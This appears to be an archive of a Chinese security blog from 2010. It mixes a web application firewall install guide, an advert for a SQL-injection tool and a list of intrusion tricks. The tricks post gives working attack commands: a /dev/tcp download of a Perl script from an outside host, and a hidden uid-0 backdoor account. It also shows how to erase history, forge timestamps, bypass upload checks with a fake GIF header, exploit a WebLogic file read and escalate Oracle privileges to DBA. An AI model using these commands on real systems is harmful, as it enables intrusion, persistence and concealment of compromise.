最近一直在研究linux服务器java提权及程序反弹,也提权过几台服务器,当然更多的目的是测试exp及服务器权限设置问题,修改了一个shell,以下为截图

点击下载此文件

十二月 23rd, 2010

Posted In: 未分类

你是否因为自己的服务器被注入可是入侵,常让你忙的手忙脚乱,以下方法可以解决你所遇到的问题,感谢开源的强大
主要功能:
黑客防御
Safe3 WEB应用防火墙基于WEB入侵异常检测技术,对WEB应用实施全面、深度防御,能够有效识别、阻止日益盛行的WEB应用黑客攻击(如SQL注入、钓鱼攻击、表单绕过、缓冲区溢出、CGI扫描、目录遍历等):
SQL注入 命令注入 Cookie 注入 脚本(XSS、CSRF) 敏感信息泄露 恶意代码 错误配置 目录遍历 会话劫持 文件包含 缓冲区溢出 应用层拒绝服务 漏洞扫描攻击 智能学习功能
通过智能学习防御最新0day攻击。
web应用加速
系统内嵌应用加速模块,通过对各类静、动态页面及部分脚本的高速内存缓存,大大提高访问速度。
敏感信息泄露防护
系统内置安全防护策略,可以灵活定义HTTP/HTTPS错误返回的默认页面,避免因为WEB服务异常,导致敏感信息(如:WEB应用安装目录、WEB服务器版本信息等)的泄露。
网页防篡改
系统提供网页防篡改功能,通过实时检测和保护机制,确保被篡改内容不被访问者浏览到。
负载均衡
系统内置负载均衡模块,实现多网站网站服务器的均衡访问。
访问日志审计
提供WEB应用访问的日志记录、分析、统计管理等。
策略配置
提供自定义安全策略配置,适应各种应用环境。
告警
实时告警,支持邮件、短信等多种方式告警。
系统报表
支持自定义统计,报表支持各类导出格式(WORD、EXCEL、PDF、HTML等)。
本版为原版精简版,功能如下
1.拦截GET sql注入
2.拦截Cookie sql注入
3.拦截XSS跨站攻击
4.拦截web溢出攻击
5.拦截非法http请求方法攻击
6.web负载均衡功能
7.网页压缩节省带宽功能
8.Web加速功能

下载地址:http://www.safe3.com.cn/safe3waf-2.3.zip
1、安装步骤:

(系统要求:Linux 2.6+ 内核,本文中的Linux操作系统为CentOS 5.5)
tar zxvf safe3waf-2.3.tar.gz
cd safe3waf-2.3
make install //默认安装到/usr/local/safe3waf/目录,可自行修改Makefile里面的安装路径

2、修改配置文件

vi /usr/local/safe3waf/etc/safe3waf.conf
webserver 192.168.2.171 80 这段改成要保护的网站的地址,可以添加多个该段做负载均衡
 

3、启动Safe3waf

ulimit -SHn 65535

/usr/local/safe3waf/bin/safe3waf.sh start

4、配置开机自启动

vi /etc/rc.local
在末尾增加以下内容:

引用
ulimit -SHn 65535

/usr/local/safe3waf/bin/safe3waf.sh start
5、优化linux内核参数

/usr/local/safe3waf/bin/optimiz_kernel.sh

十二月 22nd, 2010

Posted In: 网络技术

更新说明:

1.增强注入功能

软件特色

1.全面支持HTTP类型

支持HTTP 1.0/1.1;
支持POST/GET/Cookie方法;
支持Basic/NTLM/Digest验证;
支持基于公钥或者私钥的SSL;
2.全面的数据库类型识别

支持MS Access;
支持MS SQL Server;
支持Mysql Server;
支持Oracle Server;
支持Postgre SQL Server;
支持Informix SQL Server;
支持Sybase SQL Server;
支持DB2 SQL Server;
支持Sqlite;
3.诸多领先技术

全自动智能网页编码识别,告别数据库乱码;
内置自动智能关键字分析,无需人工干预;
支持Error/Union/Blind/Force等丰富sql注入方式,确保能获取数据;
丰富的绕过防火墙过滤功能;
内置浏览器可以注入需要登录的网站;
7.1更新说明
1.新增多字段联查功能

2.改进了对asp 、php、jsp注入报错的判断

免责声明
软件作者无法鉴别判断用户使用软件的真实用途,敬请用户在本国法律所允许范围内使用本软件,用户一旦因非法使用本软件

而违反国家相关的法律法规,所造成的一切不良后果由该用户独立承担,软件作者不负责也不承担任何直接间接或连带等法律

责任。

6.8免费版下载地址:

http://code.google.com/p/safe3si/downloads/list

十二月 20th, 2010

Posted In: 未分类

1.无wget nc等下载工具时下载文件
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0n" >&5 && cat<&5 > c.pl

2.Linux添加uid为0的用户
useradd -o -u 0 cnbird

3.bash去掉history记录
export HISTSIZE=0
export HISTFILE=/dev/null

4.SSH反向链接
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定远端服务器SSH端口
然后服务器上执行ssh localhost -p 44即可

5.weblogic本地读取文件漏洞
curl -H "wl_request_type: wl_xml_entity_request" -H "xml-registryname: ../../" -H "xml-entity-path: config.xml" http://server/wl_management_internal2/wl_management

6.apache查看虚拟web目录
./httpd -t -D DUMP_VHOSTS

7.cvs渗透技巧
CVSROOT/passwd UNIX SHA1的密码文件
CVSROOT/readers
CVSROOT/writers
CVS/Root
CVS/Entries 更新的文件和目录内容
CVS/Repository

8.Cpanel路径泄露
/3rdparty/squirrelmail/functions/plugin.php

9.修改上传文件时间戳(掩盖入侵痕迹)
touch -r 老文件时间戳 新文件时间戳

10.利用baidu和google搜索目标主机webshell
intitle:PHPJackal 1t1t

11.包总补充
创建临时?隐藏?目录 mkdir /tmp/…
/tmp/…目录在管理员有宿醉的情况下是?隐藏?的,可以临时放点exp啥的

12.利用linux输出绕过gif限制的图片
printf "GIF89ax01x00x01x00" > poc.php

13.读取环境变量对于查找信息非常有帮助
/proc/self/environ

14.最新的ORACLE 11提升用户权限(只要session权限)
DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS

判断登陆权限
select * from session_privs;
Create SESSION

select * from session_roles;

select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = 'GREMLIN(用户名)';

DESC JAVA$POLICY$

DECLARE
POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;
CURSOR C1 IS Select 'GRANT' USER(), 'SYS', 'java.io.FilePermission', '<>', 'execute', 'ENABLE' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

connect / as sysdba
COL TYPE_NAME FOR A30;
COL NAME FOR A30;
COL_ACTION FOR A10;
Select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = '用户';

connect 普通用户
set serveroutput on
exec dbms_java.set_output(10000);

Select DBMS_JAVA.SET_OUTPUT_TO_JAVA('ID', 'oracle/aurora/rdbms/DbmsJava', 'SYS', 'writeOutputToFile', 'TEXT', NULL, NULL, NULL, NULL,0,1,1,1,1,0, 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO 用户''; END;', 'BEGIN NULL; END;') FROM DUAL;

EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS('NO_SUCH_SUBSCRIPTION', SYSDATE());

set role dba;

select * from session_privs;

EXEC SYS.VULNPROC('FOO"||DBMS_JAVA.SET_OUTPUT_TO_SQL("ID","DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE""GRANT DBA TO PUBLIC"";DBMS_OUTPUT.PUT_LINE(:1);END;","TEXT")||"BAR');

Select DBMS_JAVA.RUNJAVA('oracle/aurora/util/Test') FROM DUAL;
SET ROLE DBA;

15. webLogic渗透技巧
四. Weblogin Script Tool(WLST)

写入到\config\config.xml

1.进行修改:
wlserver_10.0serverbinsetWLSenv.sh
2.启动WLST
java weblogic.WLST

wls:/offline> connect('admin', 'admin', 't3://127.0.0.1:7001')
wls:/bbk/serverConfig> help()

wls:/bbk/serverConfig> edit()
wls:/bbk/serverConfig> cd('Servers')
wls:/bbk/serverConfig/Server-cnbird> cd('Log')
wls:/bbk/serverConfig/Server-cnbird/log> cd('Server-cnbird')
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit()
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> set('FileCount', '4')
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> save()
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> activate() 提交对应Active Change
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> disconnect()
wls:/offline> exit()

3.批处理:
保存以上命令为cnbird.py
connect('admin', 'admin', 't3://127.0.0.1:7001')
cd('Servers')
cd('Log')
cd('Server-cnbird')
startEdit()
set('FileCount', '4')
save()
然后执行java weblogic.WLST cnbird.py

十二月 4th, 2010

Posted In: 未分类

无觅相关文章插件,快速提升流量